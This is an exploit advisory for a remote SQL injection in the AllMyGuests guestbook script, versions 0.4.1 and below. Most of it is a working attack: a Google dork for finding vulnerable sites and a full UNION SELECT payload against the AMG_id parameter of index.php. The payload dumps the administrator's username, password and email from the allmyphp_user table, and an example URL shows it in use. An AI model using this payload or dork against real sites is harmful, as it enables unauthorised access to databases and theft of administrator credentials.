AllMyGuests versions 0.4.1 and below suffer from a remote SQL injection vulnerability.
7f33072849bd400424508e6b772b460dc26f9811383d88b31a978eb4d6a2e999
########################################################
#
# Found by : -=Player=-
#
# Contacts : 282-246-419 (ICQ)
#
# Greatz to: Lidloses_Auge, Suicide, enco, Free-Hack
#
########################################################
#
# Script : AllMyGuests
#
# Site : http://www.php-resource.net/
#
# Dork : "powered by AllMyGuests"
#
# Valnu : index.php
#
# Parameter: AMG_id
#
# Injection: index.php?AMG_open=comments&AMG_id=null+UNION+SELECT+1,2,3,concat_ws(0x203a20,user_name,user_password,user_email),5,6,7+from+allmyphp_user+where+user_id=1--
#
# Example : http://site.de/allmyguest/index.php?AMG_open=comments&AMG_id=null+UNION+SELECT+1,2,3,concat_ws(0x203a20,user_name,user_password,user_email),5,6,7+from+allmyphp_user+where+user_id=1--
#
########################################################